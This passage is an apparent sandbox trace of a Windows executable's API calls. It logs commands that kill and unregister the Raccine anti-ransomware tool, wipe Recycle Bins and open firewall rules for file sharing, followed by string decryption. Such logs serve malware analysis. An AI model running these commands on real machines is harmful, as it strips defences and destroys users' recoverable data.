EnumProcessModules (in: hProcess=0x2a4, lphModule=0x244de98, cb=0x100, lpcbNeeded=0x26e9c4 | out: lphModule=0x244de98, lpcbNeeded=0x26e9c4) returned 1 [0079.479] GetModuleInformation (in: hProcess=0x2a4, hModule=0x3d0000, lpmodinfo=0x244dfd8, cb=0xc | out: lpmodinfo=0x244dfd8*(lpBaseOfDll=0x3d0000, SizeOfImage=0x20000, EntryPoint=0x3eb59e)) returned 1 [0079.480] CoTaskMemAlloc (cb=0x804) returned 0x720470 [0079.480] GetModuleBaseNameW (in: hProcess=0x2a4, hModule=0x3d0000, lpBaseName=0x720470, nSize=0x800 | out: lpBaseName="wqm58yk7.exe") returned 0xc [0079.480] CoTaskMemFree (pv=0x720470) [0079.480] CoTaskMemAlloc (cb=0x804) returned 0x720470 [0079.480] GetModuleFileNameExW (in: hProcess=0x2a4, hModule=0x3d0000, lpFilename=0x720470, nSize=0x800 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\wqm58yk7.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\programs\\temp\\wqm58yk7.exe")) returned 0x46 [0079.481] CoTaskMemFree (pv=0x720470) [0079.481] CloseHandle (hObject=0x2a4) returned 1 [0079.489] CoTaskMemAlloc (cb=0x20c) returned 0x71c1d8 [0079.490] SHGetFolderPathW (in: hwnd=0x0, csidl=7, hToken=0x0, dwFlags=0x0, pszPath=0x71c1d8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x0 [0079.492] CoTaskMemFree (pv=0x71c1d8) [0079.492] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", nBufferLength=0x105, lpBuffer=0x26e468, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", lpFilePart=0x0) returned 0x5b [0079.510] GetCurrentProcess () returned 0xffffffff [0079.510] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x26e980 | out: TokenHandle=0x26e980*=0x2cc) returned 1 [0079.510] GetTokenInformation (in: TokenHandle=0x2cc, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x26e980 | out: TokenInformation=0x0, ReturnLength=0x26e980) returned 0 [0079.510] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x6fa078 [0079.510] GetTokenInformation (in: TokenHandle=0x2cc, TokenInformationClass=0x8, TokenInformation=0x6fa078, TokenInformationLength=0x4, ReturnLength=0x26e980 | out: TokenInformation=0x6fa078, ReturnLength=0x26e980) returned 1 [0079.510] LocalFree (hMem=0x6fa078) returned 0x0 [0079.510] DuplicateTokenEx (in: hExistingToken=0x2cc, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x26e988 | out: phNewToken=0x26e988*=0x2c4) returned 1 [0079.510] CheckTokenMembership (in: TokenHandle=0x2c4, SidToCheck=0x2450dd8*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x26e998 | out: IsMember=0x26e998) returned 1 [0079.510] CloseHandle (hObject=0x2c4) returned 1 [0079.511] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options", ulOptions=0x0, samDesired=0x2001f, phkResult=0x26e9ac | out: phkResult=0x26e9ac*=0x2c4) returned 0x0 [0079.511] RegOpenKeyExW (in: hKey=0x2c4, lpSubKey="vssadmin.exe", ulOptions=0x0, samDesired=0x20019, phkResult=0x26e978 | out: phkResult=0x26e978*=0x0) returned 0x2 [0079.654] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0079.654] CreatePipe (in: hReadPipe=0x26e898, hWritePipe=0x26e894, lpPipeAttributes=0x26e818, nSize=0x0 | out: hReadPipe=0x26e898*=0x2d8, hWritePipe=0x26e894*=0x2dc) returned 1 [0079.654] GetCurrentProcess () returned 0xffffffff [0079.654] GetCurrentProcess () returned 0xffffffff [0079.654] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x2d8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x26e89c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x26e89c*=0x2e0) returned 1 [0079.654] CloseHandle (hObject=0x2d8) returned 1 [0079.654] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0079.654] CoTaskMemAlloc (cb=0x20e) returned 0x712620 [0079.654] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x712620 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0079.654] CoTaskMemFree (pv=0x712620) [0079.654] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"taskkill\" /F /IM RaccineSettings.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x26e7d4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x2dc, hStdError=0x0), lpProcessInformation=0x2455a14 | out: lpCommandLine="\"taskkill\" /F /IM RaccineSettings.exe", lpProcessInformation=0x2455a14*(hProcess=0x2e4, hThread=0x2d8, dwProcessId=0x8c4, dwThreadId=0x8d4)) returned 1 [0079.664] CloseHandle (hObject=0x2dc) returned 1 [0079.664] GetFileType (hFile=0x2e0) returned 0x3 [0079.664] CloseHandle (hObject=0x2d8) returned 1 [0079.665] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0079.665] CreatePipe (in: hReadPipe=0x26e898, hWritePipe=0x26e894, lpPipeAttributes=0x26e818, nSize=0x0 | out: hReadPipe=0x26e898*=0x2d8, hWritePipe=0x26e894*=0x2dc) returned 1 [0079.665] GetCurrentProcess () returned 0xffffffff [0079.665] GetCurrentProcess () returned 0xffffffff [0079.665] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x2d8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x26e89c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x26e89c*=0x2ec) returned 1 [0079.665] CloseHandle (hObject=0x2d8) returned 1 [0079.665] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0079.665] CoTaskMemAlloc (cb=0x20e) returned 0x712620 [0079.665] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x712620 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0079.666] CoTaskMemFree (pv=0x712620) [0079.666] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"reg\" delete \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Raccine Tray\" /F", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x26e774*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x2dc, hStdError=0x0), lpProcessInformation=0x2459744 | out: lpCommandLine="\"reg\" delete \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Raccine Tray\" /F", lpProcessInformation=0x2459744*(hProcess=0x2e8, hThread=0x2d8, dwProcessId=0x8e4, dwThreadId=0x8f4)) returned 1 [0079.936] CloseHandle (hObject=0x2dc) returned 1 [0079.936] GetFileType (hFile=0x2ec) returned 0x3 [0079.936] CloseHandle (hObject=0x2d8) returned 1 [0079.936] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0079.936] CreatePipe (in: hReadPipe=0x26e898, hWritePipe=0x26e894, lpPipeAttributes=0x26e818, nSize=0x0 | out: hReadPipe=0x26e898*=0x2d8, hWritePipe=0x26e894*=0x2dc) returned 1 [0079.936] GetCurrentProcess () returned 0xffffffff [0079.936] GetCurrentProcess () returned 0xffffffff [0079.936] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x2d8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x26e89c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x26e89c*=0x2f4) returned 1 [0079.937] CloseHandle (hObject=0x2d8) returned 1 [0079.937] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0079.937] CoTaskMemAlloc (cb=0x20e) returned 0x712620 [0079.937] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x712620 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0079.937] CoTaskMemFree (pv=0x712620) [0079.937] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"reg\" delete HKCU\\Software\\Raccine /F", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x26e7d4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x2dc, hStdError=0x0), lpProcessInformation=0x245d234 | out: lpCommandLine="\"reg\" delete HKCU\\Software\\Raccine /F", lpProcessInformation=0x245d234*(hProcess=0x2f0, hThread=0x2d8, dwProcessId=0x904, dwThreadId=0x914)) returned 1 [0079.941] CloseHandle (hObject=0x2dc) returned 1 [0079.941] GetFileType (hFile=0x2f4) returned 0x3 [0079.941] CloseHandle (hObject=0x2d8) returned 1 [0079.941] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0079.941] CreatePipe (in: hReadPipe=0x26e898, hWritePipe=0x26e894, lpPipeAttributes=0x26e818, nSize=0x0 | out: hReadPipe=0x26e898*=0x2d8, hWritePipe=0x26e894*=0x2dc) returned 1 [0079.941] GetCurrentProcess () returned 0xffffffff [0079.941] GetCurrentProcess () returned 0xffffffff [0079.941] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x2d8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x26e89c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x26e89c*=0x2fc) returned 1 [0079.941] CloseHandle (hObject=0x2d8) returned 1 [0079.941] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0079.941] CoTaskMemAlloc (cb=0x20e) returned 0x712620 [0079.941] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x712620 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0079.942] CoTaskMemFree (pv=0x712620) [0079.942] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"schtasks\" /DELETE /TN \"Raccine Rules Updater\" /F", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x26e7bc*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x2dc, hStdError=0x0), lpProcessInformation=0x2460da0 | out: lpCommandLine="\"schtasks\" /DELETE /TN \"Raccine Rules Updater\" /F", lpProcessInformation=0x2460da0*(hProcess=0x2f8, hThread=0x2d8, dwProcessId=0x924, dwThreadId=0x934)) returned 1 [0080.374] CloseHandle (hObject=0x2dc) returned 1 [0080.374] GetFileType (hFile=0x2fc) returned 0x3 [0080.374] CloseHandle (hObject=0x2d8) returned 1 [0080.440] GetCurrentProcess () returned 0xffffffff [0080.440] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x26e9a0 | out: TokenHandle=0x26e9a0*=0x30c) returned 1 [0080.441] GetTokenInformation (in: TokenHandle=0x30c, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x26e9a0 | out: TokenInformation=0x0, ReturnLength=0x26e9a0) returned 0 [0080.441] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x6fa068 [0080.441] GetTokenInformation (in: TokenHandle=0x30c, TokenInformationClass=0x8, TokenInformation=0x6fa068, TokenInformationLength=0x4, ReturnLength=0x26e9a0 | out: TokenInformation=0x6fa068, ReturnLength=0x26e9a0) returned 1 [0080.441] LocalFree (hMem=0x6fa068) returned 0x0 [0080.441] DuplicateTokenEx (in: hExistingToken=0x30c, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x26e9a8 | out: phNewToken=0x26e9a8*=0x310) returned 1 [0080.441] CheckTokenMembership (in: TokenHandle=0x310, SidToCheck=0x2464690*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x26e9b8 | out: IsMember=0x26e9b8) returned 1 [0080.441] CloseHandle (hObject=0x310) returned 1 [0080.505] GetCurrentProcess () returned 0xffffffff [0080.505] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x26e9a0 | out: TokenHandle=0x26e9a0*=0x324) returned 1 [0080.505] GetTokenInformation (in: TokenHandle=0x324, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x26e9a0 | out: TokenInformation=0x0, ReturnLength=0x26e9a0) returned 0 [0080.505] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x6f9fd8 [0080.505] GetTokenInformation (in: TokenHandle=0x324, TokenInformationClass=0x8, TokenInformation=0x6f9fd8, TokenInformationLength=0x4, ReturnLength=0x26e9a0 | out: TokenInformation=0x6f9fd8, ReturnLength=0x26e9a0) returned 1 [0080.506] LocalFree (hMem=0x6f9fd8) returned 0x0 [0080.506] DuplicateTokenEx (in: hExistingToken=0x324, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x26e9a8 | out: phNewToken=0x26e9a8*=0x328) returned 1 [0080.506] CheckTokenMembership (in: TokenHandle=0x328, SidToCheck=0x2485810*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x26e9b8 | out: IsMember=0x26e9b8) returned 1 [0080.506] CloseHandle (hObject=0x328) returned 1 [0080.506] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0080.506] CreatePipe (in: hReadPipe=0x26e8b8, hWritePipe=0x26e8b4, lpPipeAttributes=0x26e838, nSize=0x0 | out: hReadPipe=0x26e8b8*=0x328, hWritePipe=0x26e8b4*=0x32c) returned 1 [0080.506] GetCurrentProcess () returned 0xffffffff [0080.506] GetCurrentProcess () returned 0xffffffff [0080.506] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x328, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x26e8bc, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x26e8bc*=0x330) returned 1 [0080.506] CloseHandle (hObject=0x328) returned 1 [0080.506] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0080.507] CoTaskMemAlloc (cb=0x20e) returned 0x726118 [0080.507] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x726118 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0080.507] CoTaskMemFree (pv=0x726118) [0080.507] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"cmd.exe\" /c rd /s /q %SYSTEMDRIVE%\\\\$Recycle.bin", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x26e7dc*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x32c, hStdError=0x0), lpProcessInformation=0x2485d5c | out: lpCommandLine="\"cmd.exe\" /c rd /s /q %SYSTEMDRIVE%\\\\$Recycle.bin", lpProcessInformation=0x2485d5c*(hProcess=0x334, hThread=0x328, dwProcessId=0xa24, dwThreadId=0xa34)) returned 1 [0080.585] CloseHandle (hObject=0x32c) returned 1 [0080.585] GetFileType (hFile=0x330) returned 0x3 [0080.585] CloseHandle (hObject=0x328) returned 1 [0080.585] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0080.585] CreatePipe (in: hReadPipe=0x26e8b8, hWritePipe=0x26e8b4, lpPipeAttributes=0x26e838, nSize=0x0 | out: hReadPipe=0x26e8b8*=0x328, hWritePipe=0x26e8b4*=0x32c) returned 1 [0080.586] GetCurrentProcess () returned 0xffffffff [0080.586] GetCurrentProcess () returned 0xffffffff [0080.586] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x328, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x26e8bc, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x26e8bc*=0x33c) returned 1 [0080.586] CloseHandle (hObject=0x328) returned 1 [0080.586] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0080.586] CoTaskMemAlloc (cb=0x20e) returned 0x727928 [0080.586] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x727928 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0080.586] CoTaskMemFree (pv=0x727928) [0080.586] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"cmd.exe\" /c rd /s /q D:\\\\$Recycle.bin", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x26e7f4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x32c, hStdError=0x0), lpProcessInformation=0x24a63fc | out: lpCommandLine="\"cmd.exe\" /c rd /s /q D:\\\\$Recycle.bin", lpProcessInformation=0x24a63fc*(hProcess=0x338, hThread=0x328, dwProcessId=0xa38, dwThreadId=0xa44)) returned 1 [0080.590] CloseHandle (hObject=0x32c) returned 1 [0080.590] GetFileType (hFile=0x33c) returned 0x3 [0080.591] CloseHandle (hObject=0x328) returned 1 [0080.591] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0080.591] CreatePipe (in: hReadPipe=0x26e8b8, hWritePipe=0x26e8b4, lpPipeAttributes=0x26e838, nSize=0x0 | out: hReadPipe=0x26e8b8*=0x328, hWritePipe=0x26e8b4*=0x32c) returned 1 [0080.591] GetCurrentProcess () returned 0xffffffff [0080.591] GetCurrentProcess () returned 0xffffffff [0080.591] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x328, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x26e8bc, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x26e8bc*=0x344) returned 1 [0080.591] CloseHandle (hObject=0x328) returned 1 [0080.591] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0080.591] CoTaskMemAlloc (cb=0x20e) returned 0x727928 [0080.591] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x727928 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0080.591] CoTaskMemFree (pv=0x727928) [0080.591] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"netsh\" advfirewall firewall set rule group=\\\"Network Discovery\\\" new enable=Yes", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x26e7a0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x32c, hStdError=0x0), lpProcessInformation=0x24aa0e4 | out: lpCommandLine="\"netsh\" advfirewall firewall set rule group=\\\"Network Discovery\\\" new enable=Yes", lpProcessInformation=0x24aa0e4*(hProcess=0x340, hThread=0x328, dwProcessId=0xac8, dwThreadId=0x64)) returned 1 [0080.603] CloseHandle (hObject=0x32c) returned 1 [0080.603] GetFileType (hFile=0x344) returned 0x3 [0080.603] CloseHandle (hObject=0x328) returned 1 [0080.604] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0080.604] CreatePipe (in: hReadPipe=0x26e8b8, hWritePipe=0x26e8b4, lpPipeAttributes=0x26e838, nSize=0x0 | out: hReadPipe=0x26e8b8*=0x328, hWritePipe=0x26e8b4*=0x32c) returned 1 [0080.604] GetCurrentProcess () returned 0xffffffff [0080.604] GetCurrentProcess () returned 0xffffffff [0080.604] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x328, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x26e8bc, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x26e8bc*=0x34c) returned 1 [0080.604] CloseHandle (hObject=0x328) returned 1 [0080.604] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0080.604] CoTaskMemAlloc (cb=0x20e) returned 0x727928 [0080.604] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x727928 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0080.604] CoTaskMemFree (pv=0x727928) [0080.604] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"netsh\" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x26e794*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x32c, hStdError=0x0), lpProcessInformation=0x24ade10 | out: lpCommandLine="\"netsh\" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes", lpProcessInformation=0x24ade10*(hProcess=0x348, hThread=0x328, dwProcessId=0x524, dwThreadId=0x5b8)) returned 1 [0080.608] CloseHandle (hObject=0x32c) returned 1 [0080.608] GetFileType (hFile=0x34c) returned 0x3 [0080.609] CloseHandle (hObject=0x328) returned 1 [0080.610] SystemFunction041 (in: Memory=0x6f95b4, MemorySize=0x10, OptionFlags=0x0 | out: Memory=0x6f95b4) returned 0x0 [0081.294] SysStringLen (param_1="9C354B42") returned 0x8 [0081.370] SysStringLen (param_1="TC354B42") returned 0x8 [0081.370] SystemFunction040 (in: Memory=0x70e734, MemorySize=0x10, OptionFlags=0x0 | out: Memory=0x70e734) returned 0x0 [0081.370] SysStringLen (param_1="꘴㤿㬗銈ᲄ⧦枀") returned 0x8 [0081.370] SysStringLen (param_1="꘴㤿㬗銈ᲄ⧦枀") returned 0x8 [0081.377] SystemFunction041 (in: Memory=0x70e734, MemorySize=0x10, OptionFlags=0x0 | out: Memory=0x70e734) returned 0x0 [0081.377] SysStringLen (param_1="T3354B42") returned 0x8 [0081.377] SystemFunction040 (in: Memory=0x70e734, MemorySize=0x10, OptionFlags=0x0 | out: Memory=0x70e734) returned 0x0 [0081.377] SysStringLen (param_1="煦җဿꍳ웒岙덃䧍") returned 0x8 [0081.377] SysStringLen (param_1="煦җဿꍳ웒岙덃䧍") returned 0x8 [0081.377] SystemFunction041 (in: Memory=0x70e734, MemorySize=0x10, OptionFlags=0x0 | out: Memory=0x70e734) returned 0x0 [0081.377] SysStringLen (param_1="T3m54B42") returned 0x8 [0081.377] SystemFunction040 (in: Memory=0x70e734, MemorySize=0x10, OptionFlags=0x0 | out: Memory=0x70e734) returned 0x0 [0081.377] SysStringLen (param_1="㕶療肅듦풿팔ᔿ") returned 0x8 [0081.377] SysStringLen (param_1="㕶療肅듦풿팔ᔿ") returned 0x8 [0081.377] SystemFunction041 (in: Memory=0x70e734, MemorySize=0x10, OptionFlags=0x0 | out: Memory=0x70e734) returned 0x0 [0081.377] SysStringLen (param_1="T3m#4B42") returned 0x8 [0081.377] SystemFunction040 (in: Memory=0x70e734, MemorySize=0x10, OptionFlags=0x0 | out: Memory=0x70e734) returned 0x0 [0081.377] SysStringLen (param_1="⫌빪⨼珛貶㢑吒") returned 0x8 [0081.377] SysStringLen (param_1="⫌빪⨼珛貶㢑吒") returned 0x8 [0081.377] SystemFunction041 (in: Memory=0x70e734, MemorySize=0x10, OptionFlags=0x0 | out: Memory=0x70e734) returned 0x0 [0081.378] SysStringLen (param_1="T3m#CB42") returned 0x8 [0081.378] SystemFunction040 (in: Memory=0x70e734, MemorySize=0x10, OptionFlags=0x0 | out: Memory=0x70e734) returned 0x0 [0081.378] SysStringLen (param_1="쎅䀌눬躤ꒉ랗⩫") returned 0x8 [0081.378] SysStringLen (param_1="쎅䀌눬躤ꒉ랗⩫") returned 0x8 [0081.378] SystemFunction041 (in: Memory=0x70e734, MemorySize=0x10, OptionFlags=0x0 | out: Memory=0x70e734) returned 0x0 [0081.378] SysStringLen (param_1="T3m#CE42") returned 0x8 [0081.378] SystemFunction040 (in: Memory=0x70e734, MemorySize=0x10, OptionFlags=0x0 | out: Memory=0x70e734) returned 0x0 [0081.378] SysStringLen (param_1="螰瀽瓂䀟덶ㆄ哐卮") returned 0x8 [0081.378] SysStringLen (param_1="螰瀽瓂䀟덶ㆄ哐卮") returned 0x8 [0081.378] SystemFunction041 (in: Memory=0x70e734, MemorySize=0x10, OptionFlags=0x0 | out: Memory=0x70e734) returned 0x0 [0081.378] SysStringLen (param_1="T3m#CEr2") returned 0x8 [0081.378] SystemFunction040 (in: Memory=0x70e734, MemorySize=0x10, OptionFlags=0x0 | out: Memory=0x70e734) returned 0x0 [0081.378] SysStringLen (param_1="灳䉾勞⸲㷰 ̄ⳝ") returned 0x8 [0081.378] SysStringLen (param_1="灳䉾勞⸲㷰 ̄ⳝ") returned 0x8 [0081.378] SystemFunction041 (in: Memory=0x70e734, MemorySize=0x10, OptionFlags=0x0 | out: 